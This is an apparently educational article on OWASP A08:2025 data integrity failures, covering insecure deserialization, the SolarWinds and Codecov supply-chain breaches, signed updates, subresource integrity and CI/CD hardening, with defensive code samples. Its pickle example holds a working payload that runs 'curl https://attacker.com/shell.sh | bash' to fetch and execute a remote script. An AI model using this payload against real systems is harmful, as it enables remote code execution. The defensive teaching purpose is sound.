A08:2025

Data Integrity Failures

When applications make silent assumptions about the trustworthiness of code, data, or software updates — attackers step into that gap and own the pipeline.

Most security vulnerabilities exploit what happens at runtime: a malicious input, a misconfigured endpoint, a weak password. Data integrity failures are different. They happen upstream — before the code even runs, before the user touches the application, sometimes before the application is even deployed. They're the vulnerabilities baked into your trust model.

OWASP A08 covers a cluster of weaknesses that all share one trait: the application (or its build pipeline) blindly trusts data or code it should verify. Insecure deserialization, unsigned software updates, CI/CD pipelines with no integrity checks, JavaScript loaded from CDNs without subresource integrity hashes — all of these are different expressions of the same root failure: assuming something is safe without confirming it.

What exactly counts as a data integrity failure?

The category spans four main problem areas:

- Insecure deserialization of untrusted data
- CI/CD and build pipelines without integrity controls
- Software update mechanisms that don't verify what they download
- Third-party code (CDN scripts, packages) pulled in without integrity checks

What's notable is that these aren't implementation bugs you find by looking at one function. They're systemic — the result of a supply chain, a pipeline, or a data-handling architecture that was built without thinking about what happens when trust is violated.

Insecure deserialization: code execution hiding in your data layer

Serialization is how applications turn objects in memory into a format they can store or transmit — JSON, XML, Java's native serialization format, Python's pickle, PHP's serialized strings. Deserialization is the reverse: reconstructing that object from the stored bytes. The problem is that many native serialization formats encode not just an object's data but instructions for rebuilding it. They don't just carry data — they carry behavior.

In Java, the native serialization format allows objects to define a readObject() method that runs during deserialization. If an attacker can supply a crafted payload that chains together existing classes in the JVM classpath — a technique called "gadget chains" — they can achieve remote code execution without ever bypassing authentication. The Apache Commons Collections library famously contained gadgets that made this trivially exploitable across hundreds of Java applications. The ysoserial project catalogs dozens of these chains, and many still work against unpatched applications today.

Python's pickle module is even more direct about it:

# From the Python docs themselves:
# "Warning: The pickle module is not secure.
#  Only unpickle data you trust."

import pickle, os

class Exploit(object):
    def __reduce__(self):
        return (os.system, ('curl https://attacker.com/shell.sh | bash',))

# Serialize:
payload = pickle.dumps(Exploit())

# Attacker sends this payload to any endpoint
# that calls pickle.loads() on user input
# Result: arbitrary command execution

Any application that deserializes user-controlled data using pickle, PHP's unserialize(), Java's ObjectInputStream, or similar mechanisms — especially over untrusted channels like cookies, hidden form fields, or API parameters — is potentially vulnerable. The tell-tale signs in HTTP traffic: binary blobs in cookies, base64-encoded data that decodes to recognizable serialization headers (like rO0AB for Java, or \x80\x04 for Python pickle).
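Those markers are easy to check for programmatically. A minimal sketch (illustrative heuristics only, not a complete detector) that classifies base64-encoded cookie values by their serialization magic bytes:

```python
# Sketch: flag likely serialized blobs in cookie values.
import base64

# Magic bytes that identify common native serialization formats
MARKERS = {
    b"\xac\xed\x00\x05": "Java ObjectOutputStream",
    b"\x80\x04": "Python pickle (protocol 4)",
    b"\x80\x05": "Python pickle (protocol 5)",
}

def classify_cookie(value):
    """Return the serialization format a cookie value appears to contain, or None."""
    try:
        raw = base64.b64decode(value, validate=True)
    except Exception:
        return None  # not valid base64 at all
    for magic, name in MARKERS.items():
        if raw.startswith(magic):
            return name
    return None

# A base64-encoded Java serialization stream starts with "rO0AB"
cookie = base64.b64encode(b"\xac\xed\x00\x05\x74\x00\x04test").decode()
print(classify_cookie(cookie))  # → Java ObjectOutputStream
```

In a real assessment the same check runs over proxied traffic rather than a single value, but the heuristic is identical.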

The SolarWinds build attack: CI/CD as the kill zone

In late 2020, SolarWinds disclosed that attackers had injected malicious code into the build process for their Orion IT management platform. The code wasn't inserted into the source repository — it was injected during the build, between the legitimate source code and the signed binary that shipped to customers. The result was a backdoor, signed with SolarWinds' own certificate, distributed as a trusted software update to roughly 18,000 organizations including US government agencies.

The build pipeline itself was the attack surface. No amount of code review, static analysis, or penetration testing of the Orion application would have caught it, because the malicious code was introduced after all of those controls ran. The adversary had access to the build system — a machine that most organizations treat as internal infrastructure rather than a security boundary.

The Codecov breach in 2021 followed the same logic but at a different layer. Attackers modified Codecov's bash uploader script — a shell script widely used in CI pipelines to upload code coverage reports. The tampered script harvested CI environment variables (including tokens, secrets, and credentials) and exfiltrated them. Thousands of CI jobs ran the compromised script before anyone noticed, because organizations pulled the script directly from Codecov's CDN with no integrity verification.

Build infrastructure has become one of the highest-value targets in software supply chain attacks. Compromise the build, and you get code execution on every machine that runs the output — with a valid signature.

The structural problem: most CI/CD pipelines have more trust than they have isolation. Secrets are injected as environment variables accessible to any step. Third-party actions or scripts are pinned to mutable tags rather than immutable SHAs. Pipeline workers have write access to artifact repositories. A single compromised node can contaminate the entire build.
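The mutable-tag problem in particular is cheap to audit. A rough sketch that flags uses: references in a GitHub Actions workflow not pinned to a full commit SHA (the action names and the SHA below are placeholders for illustration):

```python
# Sketch: find Actions steps pinned to mutable refs (tags/branches) instead of SHAs.
import re

USES_RE = re.compile(r"uses:\s*([\w./-]+)@([\w.-]+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")  # a full commit SHA is 40 hex chars

def find_mutable_pins(workflow_text):
    """Return (action, ref) pairs whose ref is not an immutable commit SHA."""
    findings = []
    for action, ref in USES_RE.findall(workflow_text):
        if not SHA_RE.match(ref):
            findings.append((action, ref))
    return findings

workflow = """
steps:
  - uses: actions/checkout@v4
  - uses: actions/setup-python@0123456789abcdef0123456789abcdef01234567
"""
print(find_mutable_pins(workflow))  # → [('actions/checkout', 'v4')]
```

Tools like OpenSSF Scorecard perform this check (and many others) at scale; the point of the sketch is only that the failure mode is mechanically detectable.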

Unsigned software updates

Auto-update mechanisms are a necessary evil — without them, users run outdated software forever, and patching security holes becomes a years-long exercise. But an update mechanism that fetches and executes code over the network without verifying authenticity is essentially a remote code execution endpoint waiting to be abused.

The attack surface here is straightforward: if an update server is compromised, if traffic is intercepted (man-in-the-middle on HTTP update channels), or if the update URL can be manipulated, the application will happily download and execute attacker-controlled code. Historical examples include embedded devices that fetched firmware updates over plain HTTP, desktop applications that checked a vendor server without certificate pinning, and Electron apps that called autoUpdater without signature verification on the update payload.

The correct implementation uses a signing key that the update client knows in advance:

# Secure update check — verify signature before executing
import requests
from cryptography.exceptions import InvalidSignature

UPDATE_SERVER = "https://updates.yourapp.com"
SIGNING_KEY_PUBLIC = load_public_key()  # Ed25519 public key bundled with the app

def fetch_and_verify_update(version):
    resp = requests.get(f"{UPDATE_SERVER}/release/{version}.tar.gz")
    sig_resp = requests.get(f"{UPDATE_SERVER}/release/{version}.tar.gz.sig")
    resp.raise_for_status()
    sig_resp.raise_for_status()

    payload = resp.content
    signature = sig_resp.content

    # Verify Ed25519 signature before doing anything with payload
    try:
        SIGNING_KEY_PUBLIC.verify(signature, payload)
    except InvalidSignature:
        raise RuntimeError("Update signature verification failed — aborting")

    return payload  # only reaches here if signature is valid

The signing key must be bundled with the application, not fetched from the same server as the update. Otherwise you've just moved the trust problem one level up.
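For completeness, here is a sketch of both halves of such a scheme using Ed25519 via the cryptography library. The key handling is deliberately simplified: in practice the private key lives in an HSM or signing service, never on a build worker or next to the artifact.

```python
# Sketch: Ed25519 sign/verify round trip with the `cryptography` library.
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
from cryptography.exceptions import InvalidSignature

# Build side: sign the release artifact with the private key
private_key = Ed25519PrivateKey.generate()
payload = b"...release tarball bytes..."
signature = private_key.sign(payload)

# Client side: verify with the public key bundled into the application
public_key = private_key.public_key()
public_key.verify(signature, payload)  # raises InvalidSignature on mismatch

# Any tampering with the payload invalidates the signature
try:
    public_key.verify(signature, payload + b"x")
except InvalidSignature:
    print("tampered payload rejected")
```

The verify() call raising an exception (rather than returning a boolean) is a deliberate API choice: it makes "forgot to check the result" a crash instead of a silent bypass.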

Subresource Integrity: trusting third-party scripts

When you include a script from a CDN — <script src="https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js"></script> — you're telling the browser: execute whatever bytes arrive from that URL, unconditionally. If that CDN is compromised, or if an attacker can perform DNS hijacking, or if the CDN has a path traversal bug, your users run attacker code with full DOM access.

Subresource Integrity (SRI) is the browser's defense. You add an integrity attribute with a cryptographic hash of the expected file. The browser hashes what it receives and refuses to execute it if the hashes don't match:

<!-- Without SRI: trust whatever cdn.example.com sends -->
<script src="https://cdn.example.com/library.js"></script>

<!-- With SRI: only execute if SHA-384 hash matches -->
<script
  src="https://cdn.example.com/library.js"
  integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"
  crossorigin="anonymous">
</script>

Generate the hash with: openssl dgst -sha384 -binary library.js | openssl base64 -A, or use an online generator such as srihash.org. Note that SRI stops tampering with the files you already reference; it does not stop an attacker who can inject markup from adding a new <script> tag with no integrity attribute. Pair it with a strict Content Security Policy to cover that case.
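The same value can be computed programmatically; a short sketch using only the Python standard library ("sha384-" plus the base64 of the raw digest):

```python
# Sketch: compute an SRI integrity value for a file's contents.
import base64
import hashlib

def sri_hash(content):
    """Return the SRI integrity attribute value for the given bytes."""
    digest = hashlib.sha384(content).digest()
    return "sha384-" + base64.b64encode(digest).decode()

print(sri_hash(b"console.log('hello');"))
```

Recomputing this in CI and diffing it against the hash in your templates is a cheap way to catch silent upstream changes to pinned files.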

Real-world impact

SolarWinds Orion (2020): 18,000+ organizations compromised by a backdoor injected into the build process. Signed binary, undetected by endpoint tooling for months. Attributed to the SVR (Russian intelligence).

Codecov breach (2021): CI environment secrets harvested from thousands of pipelines via tampered bash uploader. Affected HashiCorp, Twilio, Rapid7 and others.

event-stream npm package (2018): Malicious maintainer added a dependency that stole Bitcoin wallet keys from Copay users. Package had 2M weekly downloads.

Java deserialization (Apache Commons Collections): Exploited in WebLogic, JBoss, Jenkins, WebSphere — unauthenticated RCE, no user interaction required.

CI/CD security: what "secure" actually means in practice

Defending a CI/CD pipeline isn't one thing — it's a set of independently necessary controls that together raise the bar for attackers:

Pin dependencies to immutable references

In GitHub Actions, pinning to a tag like actions/checkout@v4 means you're trusting whoever controls that tag — which can be moved. Pin to a commit SHA instead:

# Vulnerable — tag can be moved to point at malicious code
- uses: actions/checkout@v4

# Secure — SHA is immutable, this exact commit will always run
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683

Separate build and deploy secrets

Build jobs should not have write access to production environments. Use OIDC federation to grant short-lived credentials at deploy time, scoped to exactly what the job needs.

Sign build artifacts

Use Sigstore/cosign to sign container images and binaries at build time. Verify signatures before deployment:

# Sign an image with cosign (keyless, OIDC-based)
cosign sign --yes ghcr.io/yourorg/yourapp:latest

# Verify before deploying
cosign verify \
  --certificate-identity-regexp "^https://github.com/yourorg/yourapp/" \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  ghcr.io/yourorg/yourapp:latest

Audit and restrict CI worker permissions

CI workers should have read-only access to source repositories and no direct production access. Treat them like untrusted network segments, not like developer laptops.

Fixing insecure deserialization

The cleanest defense is to not deserialize untrusted data using native serialization formats. Use data-only formats like JSON or protobuf, which don't carry executable behavior. When you parse JSON, you get data — you don't get code execution. When you unpickle a Python object, you might get both.
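The difference is easy to demonstrate: a hostile-looking key in JSON is just a string, and nothing runs during parsing:

```python
# JSON deserialization yields only plain data types; there is no hook for a
# class to execute code during parsing, unlike pickle's __reduce__.
import json

untrusted = '{"user": "alice", "role": "admin", "__reduce__": "ignored"}'
obj = json.loads(untrusted)

print(type(obj))          # <class 'dict'>
print(obj["__reduce__"])  # just a string value, never executed
```

Validate the parsed data against a schema afterwards, of course — data-only formats remove the code-execution risk, not the input-validation problem.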

Where native deserialization is necessary:

// Java: allowlist deserialization with ObjectInputFilter
ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(
    "com.yourapp.dto.*;java.util.*;!*"  // allow your DTOs + java.util, reject everything else
);

ObjectInputStream ois = new ObjectInputStream(inputStream);
ois.setObjectInputFilter(filter);
YourDto obj = (YourDto) ois.readObject();
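Python's rough equivalent of that allowlist approach, following the pattern suggested in the pickle documentation, is to subclass Unpickler and restrict which classes it will resolve (the allowlist below is illustrative):

```python
# Sketch: an allowlisting unpickler, analogous to Java's ObjectInputFilter.
import builtins
import io
import pickle

SAFE_BUILTINS = {"list", "dict", "set", "tuple", "str", "int", "float", "bool"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only allow a handful of harmless builtins; reject everything else,
        # including os.system and any application class.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"forbidden class {module}.{name}")

def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

print(restricted_loads(pickle.dumps([1, 2, 3])))  # → [1, 2, 3]
```

A payload that references os.system (like the __reduce__ exploit earlier) now fails with UnpicklingError instead of executing. Even so, prefer a data-only format; the allowlist is a mitigation for code you can't yet migrate.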

How to detect these issues in your application

Data integrity failures don't show up in standard DAST scans the way SQL injection does — you can't just fuzz parameters and look for database errors. Detection requires a combination of approaches: inspecting traffic and cookies for serialization markers, auditing pages for third-party scripts without SRI, scanning dependency manifests for known-malicious packages, and manually reviewing build pipeline configuration.

Automated scanning can catch the low-hanging fruit — SRI violations, known-vulnerable libraries, basic deserialization markers in cookies. But the deeper CI/CD and signing issues require manual review of your build infrastructure. The OWASP SAMM (Software Assurance Maturity Model) provides a structured way to assess and improve your supply chain controls over time.
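One of those automatable checks can be sketched in a few lines: scan rendered HTML for cross-origin scripts that lack an integrity attribute (standard library only; a real audit would also cover stylesheets and resolve protocol-relative URLs):

```python
# Sketch: flag externally-loaded <script> tags with no SRI integrity attribute.
from html.parser import HTMLParser

class SriAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        src = attrs.get("src", "")
        if tag == "script" and src.startswith("https://") and "integrity" not in attrs:
            self.findings.append(src)

page = '<script src="https://cdn.example.com/library.js"></script>'
audit = SriAudit()
audit.feed(page)
print(audit.findings)  # → ['https://cdn.example.com/library.js']
```

Running this against every page template in CI turns "we forgot SRI on that tag" from a silent gap into a failing build.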

A08 in the broader context: integrity as a design principle

It's worth stepping back to notice what all A08 vulnerabilities have in common: they're failures of design, not implementation. A developer who uses pickle.loads() on user input didn't make a typo — they made a design decision (maybe without realizing it). A team whose CI pipeline pulls scripts from external URLs with no integrity checks didn't write buggy code — they built a pipeline without thinking about the trust model.

The fix isn't a patch. It's a posture: assume that anything you didn't cryptographically verify could have been tampered with. Code from external registries. Build scripts from CDNs. Serialized objects from session cookies. Software updates from your own server. The more implicit trust your system requires, the larger the attack surface you're accepting.

SolarWinds is the canonical example because it proved that even a correctly-implemented, well-reviewed, properly-signed piece of software can be compromised — if the process that produces it isn't treated as a security boundary. Build pipelines are now attack surfaces. Treat them accordingly.

Check your integrity controls

Test your application for insecure deserialization markers, missing SRI attributes, vulnerable dependencies, and other A08:2025 issues.
